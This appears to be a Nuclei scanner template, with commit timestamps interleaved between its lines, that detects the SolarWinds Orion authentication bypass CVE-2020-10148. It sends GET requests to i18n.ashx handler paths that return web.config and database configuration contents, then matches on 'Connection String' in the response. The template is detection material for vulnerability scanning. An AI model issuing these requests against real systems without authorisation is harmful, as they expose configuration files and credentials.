2021-01-02 04:56:15 +00:00
id : CVE-2020-10148
2020-12-29 07:32:08 +00:00
info :
2022-05-16 15:30:00 +00:00
name : SolarWinds Orion API - Auth Bypass
2020-12-29 07:32:08 +00:00
author : dwisiswant0
2021-09-10 11:26:40 +00:00
severity : critical
2020-12-29 07:32:08 +00:00
description : |
2022-05-16 15:30:00 +00:00
SolarWinds Orion API is vulnerable to an authentication bypass vulnerability that could allow a remote attacker to execute API commands. This vulnerability could allow a remote attacker to bypass authentication and execute API commands which may result in a compromise of the SolarWinds instance. SolarWinds Orion Platform versions 2019.4 HF 5, 2020.2 with no hotfix installed, and 2020.2 HF 1 are affected.
2021-08-19 13:15:35 +00:00
reference :
- https://kb.cert.org/vuls/id/843464
- https://github.com/jaeles-project/jaeles-signatures/blob/master/cves/solarwinds-lfi-cve-2020-10148.yaml
- https://gist.github.com/0xsha/75616ef6f24067c4fb5b320c5dfa4965
- https://twitter.com/0xsha/status/1343800953946787847
2022-05-16 15:30:00 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-10148
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-10148
cwe-id : CWE-287
2022-04-22 10:38:41 +00:00
tags : cve,cve2020,solarwinds,rce,auth,bypass
2020-12-29 07:32:08 +00:00
requests :
- method : GET
path :
2021-01-01 10:40:35 +00:00
- "{{BaseURL}}/web.config.i18n.ashx?l=nuclei&v=nuclei"
2022-03-29 10:30:27 +00:00
- "{{BaseURL}}/SWNetPerfMon.db.i18n.ashx?l=nuclei&v=nuclei"
stop-at-first-match : true
2020-12-29 07:32:08 +00:00
matchers-condition : and
matchers :
2020-12-31 08:51:24 +00:00
- type : word
2022-03-29 10:30:27 +00:00
part : body
2020-12-31 08:51:24 +00:00
words :
- "SolarWinds.Orion.Core."
2022-03-29 10:30:27 +00:00
- "Connection String"
condition : or
2021-01-01 11:33:22 +00:00
- type : word
2022-03-29 10:30:27 +00:00
part : header
2021-01-01 11:33:22 +00:00
words :
2021-01-01 10:38:09 +00:00
- "text/plain"
2020-12-29 07:32:08 +00:00
- type : status
status :
2022-01-04 19:34:16 +00:00
- 200
2022-05-16 15:30:00 +00:00
# Enhanced by mp on 2022/05/16